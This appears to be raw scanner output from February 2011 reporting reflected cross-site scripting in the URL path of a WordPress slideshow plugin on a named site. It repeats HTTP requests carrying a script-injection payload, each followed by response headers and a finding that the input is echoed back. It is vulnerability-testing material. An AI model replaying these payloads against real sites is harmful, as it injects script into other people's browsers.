GET /site/wp-content/plugins/superslider-showa062d"><script>alert(1)</script>5479a44adae/plugin-data/superslider/ssShow/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:45 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674565+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674566; expires=Thu, 02-Feb-2012 19:22:46 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:46 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53443
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf811"><script>alert(1)</script>3f0521f2648 was submitted in the REST URL parameter 5. This input was echoed as cf811\"><script>alert(1)</script>3f0521f2648 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/plugin-datacf811"><script>alert(1)</script>3f0521f2648/superslider/ssShow/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:47 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674567+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674568; expires=Thu, 02-Feb-2012 19:22:48 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:48 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53443
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c16c7"><script>alert(1)</script>0518058665f was submitted in the REST URL parameter 6. This input was echoed as c16c7\"><script>alert(1)</script>0518058665f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/plugin-data/supersliderc16c7"><script>alert(1)</script>0518058665f/ssShow/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:49 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674569+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674569; expires=Thu, 02-Feb-2012 19:22:49 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:49 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53443
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb0ac"><script>alert(1)</script>6823b746046 was submitted in the REST URL parameter 7. This input was echoed as cb0ac\"><script>alert(1)</script>6823b746046 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShowcb0ac"><script>alert(1)</script>6823b746046/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:51 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674571+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674571; expires=Thu, 02-Feb-2012 19:22:51 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:51 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53443
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7485"><script>alert(1)</script>4c6d54f9ffe was submitted in the REST URL parameter 8. This input was echoed as f7485\"><script>alert(1)</script>4c6d54f9ffe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/defaultf7485"><script>alert(1)</script>4c6d54f9ffe/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:53 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674574+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674574; expires=Thu, 02-Feb-2012 19:22:54 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:54 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53443
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d29d"><script>alert(1)</script>086bd3cb201 was submitted in the REST URL parameter 9. This input was echoed as 6d29d\"><script>alert(1)</script>086bd3cb201 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css6d29d"><script>alert(1)</script>086bd3cb201 HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:55 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674576+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674576; expires=Thu, 02-Feb-2012 19:22:56 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:56 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53443
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c215d"><script>alert(1)</script>2a891610468 was submitted in the REST URL parameter 1. This input was echoed as c215d\"><script>alert(1)</script>2a891610468 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sitec215d"><script>alert(1)</script>2a891610468/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:43 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674563+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674563; expires=Thu, 02-Feb-2012 19:22:43 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:43 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53449
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34007"><script>alert(1)</script>c24b863bac was submitted in the REST URL parameter 2. This input was echoed as 34007\"><script>alert(1)</script>c24b863bac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content34007"><script>alert(1)</script>c24b863bac/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:44 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674564+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674565; expires=Thu, 02-Feb-2012 19:22:45 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:45 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53447
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 888b9"><script>alert(1)</script>1856c8b9929 was submitted in the REST URL parameter 3. This input was echoed as 888b9\"><script>alert(1)</script>1856c8b9929 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins888b9"><script>alert(1)</script>1856c8b9929/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:47 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674567+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674568; expires=Thu, 02-Feb-2012 19:22:48 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:48 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53449
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 744e0"><script>alert(1)</script>c4cb7786a57 was submitted in the REST URL parameter 4. This input was echoed as 744e0\"><script>alert(1)</script>c4cb7786a57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show744e0"><script>alert(1)</script>c4cb7786a57/plugin-data/superslider/ssShow/lightbox/lightbox.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:50 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674570+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674570; expires=Thu, 02-Feb-2012 19:22:50 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:50 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53449
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 479a5"><script>alert(1)</script>22d092f232f was submitted in the REST URL parameter 5. This input was echoed as 479a5\"><script>alert(1)</script>22d092f232f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/plugin-data479a5"><script>alert(1)</script>22d092f232f/superslider/ssShow/lightbox/lightbox.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:52 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674573+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674573; expires=Thu, 02-Feb-2012 19:22:53 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:53 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53449
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0d53"><script>alert(1)</script>fd42f611c98 was submitted in the REST URL parameter 6. This input was echoed as a0d53\"><script>alert(1)</script>fd42f611c98 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/plugin-data/superslidera0d53"><script>alert(1)</script>fd42f611c98/ssShow/lightbox/lightbox.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:54 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674575+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674575; expires=Thu, 02-Feb-2012 19:22:55 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:55 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53449
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eca9c"><script>alert(1)</script>1f4a2f0771d was submitted in the REST URL parameter 7. This input was echoed as eca9c\"><script>alert(1)</script>1f4a2f0771d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShoweca9c"><script>alert(1)</script>1f4a2f0771d/lightbox/lightbox.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:58 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674578+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674578; expires=Thu, 02-Feb-2012 19:22:58 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:58 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53449
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 367d7"><script>alert(1)</script>a6f2c5f9e26 was submitted in the REST URL parameter 8. This input was echoed as 367d7\"><script>alert(1)</script>a6f2c5f9e26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox367d7"><script>alert(1)</script>a6f2c5f9e26/lightbox.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:59 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674579+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674580; expires=Thu, 02-Feb-2012 19:23:00 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:00 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53449
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e566"><script>alert(1)</script>d02d1ba07b1 was submitted in the REST URL parameter 9. This input was echoed as 1e566\"><script>alert(1)</script>d02d1ba07b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css1e566"><script>alert(1)</script>d02d1ba07b1 HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
